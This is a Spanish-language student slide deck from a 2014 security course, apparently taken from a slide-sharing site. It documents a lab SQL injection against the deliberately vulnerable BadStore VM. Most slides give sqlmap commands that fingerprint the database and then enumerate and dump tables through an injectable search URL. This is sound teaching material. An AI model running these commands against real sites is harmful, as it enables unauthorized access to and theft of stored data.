Especialización en 
Seguridad Informática 
• Ataque por inyección de 
código SQL 
Estudiante: Daniel Felipe Palomo Luna 
Ibagué, Septiembre de 2014
Ataque por inyección de 
código SQL 
1. Teniendo la imagen 
ISO de BadStore 
configurada en una 
maquina virtual de 
Virtualbox, se procede 
a conocer la dirección 
IP asignada para 
ingresar vía web 
desde el equipo donde 
se realizara el ataque 
a la Base de Datos.
2. Luego de conocer la 
dirección IP, en este caso 
asignada la 192.168.1.3 
mediante DHCP, se 
procede a ingresar desde 
un navegador web para 
verificar el funcionamiento 
del servidor web. 
Ataque por inyección de 
código SQL
3. Dentro del sitio web, se 
debe explorar cada uno de 
los menús para visualizar 
las diferentes páginas 
alojadas, con esto se logra 
obtener en la URL la 
primera vulnerabilidad: 
Manejo de variables con 
métodos GET Y POST 
Variable encontrada: action 
Ataque por inyección de 
código SQL
Ataque por inyección de 
código SQL 
4. Al conocer una de las variables que maneja la página a nivel de programación, se 
logra el descubrimiento del motor y la versión de la Base de Datos con el siguiente 
comando: 
sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" -b
Ataque por inyección de 
código SQL 
5. Obtención del nombre de la Base de Datos con el siguiente comando: 
sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" 
--current-db
Ataque por inyección de 
código SQL 
6. Obtención del listado de tablas de la Base de Datos con el siguiente comando: 
sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" 
--tables -D badstoredb
Ataque por inyección de 
código SQL 
7. Obtención del listado de columnas de la tabla itemdb de la Base de Datos con el 
siguiente comando: 
sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" 
-D badstoredb -T itemdb --columns
Ataque por inyección de 
código SQL 
8. Visualización de los datos almacenados en la tabla itemdb de la Base de Datos con 
el siguiente comando: 
sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" 
-D badstoredb -T itemdb -C ldesc --dump

Más contenido relacionado

PPTX
Ataque por inyección de código sql
PPTX
Practica 1 seguridad en bases de datos
PDF
Ataque por inyección de código sql y sniffing
PPTX
Ataques a bases de datos
PPTX
Apache cassandra cosnola
PPTX
Ataque sql web
PPTX
2. ataque por inyección de código sql a sitio web
DOCX
Ejercicio3 mysql
Ataque por inyección de código sql
Practica 1 seguridad en bases de datos
Ataque por inyección de código sql y sniffing
Ataques a bases de datos
Apache cassandra cosnola
Ataque sql web
2. ataque por inyección de código sql a sitio web
Ejercicio3 mysql

La actualidad más candente (7)

PDF
Servidor FTP con usuarios en MySQL
DOCX
Practica de replicacion maestro esclavo en mysql
PDF
Manual Técnico Para Hacer Réplica
PDF
Actividad No. 1.6: Creación de bases de datos en MySQL
PDF
Autentificacion sql antonio_hermoso
DOCX
Respaldando bd
PPT
Pendrive Linux
Servidor FTP con usuarios en MySQL
Practica de replicacion maestro esclavo en mysql
Manual Técnico Para Hacer Réplica
Actividad No. 1.6: Creación de bases de datos en MySQL
Autentificacion sql antonio_hermoso
Respaldando bd
Pendrive Linux
Publicidad

Similar a Ataque inyeccion sql (20)

PPTX
Ataque con inyeccion de codigo sql a sitio web
PDF
Presentacion practica seguridad bd
PDF
reto-by-q3rv0
PDF
Actividad No. 1.11: SQL Injection con sqlmap en Kali Linux
PDF
Tutorial CodeIgniter + Netbeans 7
PDF
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
PDF
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
PDF
William fabricio manual de sistemas sas
PDF
6.2.4.4 Packet Tracer - Router and Switch Resilience.pdf
PDF
Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...
PPT
Symfony Parte 2
PDF
Ataque masivo a WordPress con ILLOWP
PDF
Forense en WordPress
PPTX
Creación de una base de datos en el hosting
PDF
Introducción a las vulnerabilidades web
PDF
Deploying Wordpress
PDF
ATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEB
PPTX
CouchDB y el desarrollo de aplicaciones Android
PDF
Infografia farmacia laravel
PPTX
Dns spoofing kali linux
Ataque con inyeccion de codigo sql a sitio web
Presentacion practica seguridad bd
reto-by-q3rv0
Actividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Tutorial CodeIgniter + Netbeans 7
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
William fabricio manual de sistemas sas
6.2.4.4 Packet Tracer - Router and Switch Resilience.pdf
Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...
Symfony Parte 2
Ataque masivo a WordPress con ILLOWP
Forense en WordPress
Creación de una base de datos en el hosting
Introducción a las vulnerabilidades web
Deploying Wordpress
ATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEB
CouchDB y el desarrollo de aplicaciones Android
Infografia farmacia laravel
Dns spoofing kali linux
Publicidad

Último (20)

PDF
Webinar Jscrambler & Integrity360 Update
PDF
.GUIA DE GUIA DE TRABAJO NUEVO TESTAMENTO.pdf
DOCX
Proyecto del instituto Gilda Ballivian Rosado
PDF
Libro de Oraciones guia virgen peregrina
PPTX
Plantilla-Hardware-Informático-oficce.pptx
PPTX
Charla 3 - La gestión de servicios de TI.pptx
PPTX
presentación sobre Programación SQL.pptx
PPTX
NACIONALIDAD Y CIUDADANIA (1).pptxggggfffddd
PDF
MU_Gestion_Internacional_Edificacion_Construccion_MBA.pdf
PDF
EL BRANDBOOK MUNDUS DE PERFUMERIA NICHO
DOCX
TRABAJO DE ESTRATEGIA MAXIMILIANO ELIZARRARAS.docx
PPTX
PRESENTACION NIA 220 idhsahdjhJKSDHJKSHDJSHDJKHDJHSAJDHJKSAHDJkhjskdhasjdhasj...
PPSX
00 Elementos de la Ventana de Excel.ppsx
PPTX
PARTE DE UNA PC _ SEIRY.pptx.........................
PPTX
Informática e inteligencia artificial (2).pptx
PPTX
jajajajajajajajajajjajajajajjajajajahdegdhwgfedhgfdhdfe
PDF
AWS CloudOpS training español (Operaciones en la nube)
PPT
redes.ppt unidad 2 perteneciente a la ing de software
PDF
LA INTELIGENCIA ARTIFICAL SU HISTORIA Y EL FUTURO
PDF
como me enamore de ti (1).pdf.pdf_20250813_191720_0000.pdf
Webinar Jscrambler & Integrity360 Update
.GUIA DE GUIA DE TRABAJO NUEVO TESTAMENTO.pdf
Proyecto del instituto Gilda Ballivian Rosado
Libro de Oraciones guia virgen peregrina
Plantilla-Hardware-Informático-oficce.pptx
Charla 3 - La gestión de servicios de TI.pptx
presentación sobre Programación SQL.pptx
NACIONALIDAD Y CIUDADANIA (1).pptxggggfffddd
MU_Gestion_Internacional_Edificacion_Construccion_MBA.pdf
EL BRANDBOOK MUNDUS DE PERFUMERIA NICHO
TRABAJO DE ESTRATEGIA MAXIMILIANO ELIZARRARAS.docx
PRESENTACION NIA 220 idhsahdjhJKSDHJKSHDJSHDJKHDJHSAJDHJKSAHDJkhjskdhasjdhasj...
00 Elementos de la Ventana de Excel.ppsx
PARTE DE UNA PC _ SEIRY.pptx.........................
Informática e inteligencia artificial (2).pptx
jajajajajajajajajajjajajajajjajajajahdegdhwgfedhgfdhdfe
AWS CloudOpS training español (Operaciones en la nube)
redes.ppt unidad 2 perteneciente a la ing de software
LA INTELIGENCIA ARTIFICAL SU HISTORIA Y EL FUTURO
como me enamore de ti (1).pdf.pdf_20250813_191720_0000.pdf

Ataque inyeccion sql

  • 1. Especialización en Seguridad Informática • Ataque por inyección de código SQL Estudiante: Daniel Felipe Palomo Luna Ibagué, Septiembre de 2014
  • 2. Ataque por inyección de código SQL 1. Teniendo la imagen ISO de BadStore configurada en una maquina virtual de Virtualbox, se procede a conocer la dirección IP asignada para ingresar vía web desde el equipo donde se realizara el ataque a la Base de Datos.
  • 3. 2. Luego de conocer la dirección IP, en este caso asignada la 192.168.1.3 mediante DHCP, se procede a ingresar desde un navegador web para verificar el funcionamiento del servidor web. Ataque por inyección de código SQL
  • 4. 3. Dentro del sitio web, se debe explorar cada uno de los menús para visualizar las diferentes páginas alojadas, con esto se logra obtener en la URL la primera vulnerabilidad: Manejo de variables con métodos GET Y POST Variable encontrada: action Ataque por inyección de código SQL
  • 5. Ataque por inyección de código SQL 4. Al conocer una de las variables que maneja la página a nivel de programación, se logra el descubrimiento del motor y la versión de la Base de Datos con el siguiente comando: sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" -b
  • 6. Ataque por inyección de código SQL 5. Obtención del nombre de la Base de Datos con el siguiente comando: sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --current-db
  • 7. Ataque por inyección de código SQL 6. Obtención del listado de tablas de la Base de Datos con el siguiente comando: sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --tables -D badstoredb
  • 8. Ataque por inyección de código SQL 7. Obtención del listado de columnas de la tabla itemdb de la Base de Datos con el siguiente comando: sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" -D badstoredb -T itemdb --columns
  • 9. Ataque por inyección de código SQL 8. Visualización de los datos almacenados en la tabla itemdb de la Base de Datos con el siguiente comando: sqlmap.py -u "http://192.168.1.3/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" -D badstoredb -T itemdb -C ldesc --dump